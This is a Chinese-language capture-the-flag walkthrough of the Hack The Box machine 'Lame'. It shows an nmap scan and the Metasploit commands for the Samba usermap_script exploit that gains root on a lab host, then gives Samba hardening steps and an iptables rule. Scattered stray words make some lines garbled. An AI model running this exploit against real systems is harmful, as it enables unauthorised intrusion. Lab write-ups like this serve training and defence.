本文做者:shavchen安全
此次挑战的靶机是Lame,距今900天+,历史感十足网络
靶机描述
Lame is a beginner level machine, requiring only one exploit to obtain root access.
It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.tcp
技能收获:Smaba漏洞利用ide
基本信息
Kali ip :10.10.14.3
Lameip:10.10.10.3测试
通讯正常,延时偏高网站
端口扫描ui
nmap -sV -A -p- 10.10.10.3
啊,Sambablog
靶机开启了Smaba服务,那还有什么好说的接口
search Samba
选择exploit/multi/samba/usermap_script网络安全
use exploit/multi/samba/usermap_script set rhosts 10.10.10.3 exploit
emem,至此完成?靶机简单,那咱们加固一下吧
查看samba版本
修改配置文件,位置:/etc/samba/smb.conf
#加入参数 encrypt passwords=yes smb passwd file=/etc/samba/smbpasswd
这样,当security=user时,经过/etc/samba/smbpasswd文件进行验证,验证过程无明码传输
不使用共享级别的安全
当security=share的时候,samba安全性比较差,灵活性不强,因此应避免使用共享级别安全
限制网络接口访问
这个适用于多网卡用户,限制samba只响应来自内网的用户请求
interfaces=192.168.1.1/24 127.0.0.1 bind interfaces only=yes
#ip控制 hosts deny=ALL hosts allow=192.168.1.0/24 127.0.0.1 #主机控制 hosts deny=ALL hosts allow=win01,win02,win05 #用户控制,容许用户smb01,smb02与组samba,admin访问 valid users=smb01,smb02,@samba@admin
iptables -t filter -A INPUT -p tcp --dport 139 -j DROP
apt-get install samba
转载请联系做者并注明出处!
Ms08067安全实验室专一于网络安全知识的普及和培训。团队已出版《Web安全***:***测试实战指南》,《内网安全***:***测试实战指南》,《Python安全***:***测试实战指南》,《Java代码安全审计(入门篇)》等书籍。团队按期分享关于CTF靶场、内网***、APT方面技术干货,从零开始、以实战落地为主官方网站:https://www.ms08067.com/